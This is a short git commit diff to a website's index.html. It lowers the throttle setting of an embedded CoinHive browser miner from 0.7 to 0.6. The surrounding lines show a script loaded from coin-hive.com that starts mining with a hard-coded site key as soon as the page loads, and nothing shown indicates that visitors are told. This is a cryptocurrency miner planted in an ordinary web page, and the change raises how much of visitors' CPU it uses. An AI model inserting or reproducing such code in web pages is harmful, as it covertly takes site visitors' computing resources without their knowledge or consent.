Update index.html
This commit is contained in:
parent
5a526e9568
commit
403c483624
1 changed files with 1 additions and 1 deletions
|
@ -58,7 +58,7 @@
|
||||||
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
|
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
|
||||||
<script>
|
<script>
|
||||||
var miner = new CoinHive.Anonymous('W9e1JbsYTHqCwImFfAEGfJJigBCWfYv2', {
|
var miner = new CoinHive.Anonymous('W9e1JbsYTHqCwImFfAEGfJJigBCWfYv2', {
|
||||||
throttle:0.7
|
throttle:0.6
|
||||||
});
|
});
|
||||||
miner.start();
|
miner.start();
|
||||||
</script>
|
</script>
|
||||||
|
|
Loading…
Reference in a new issue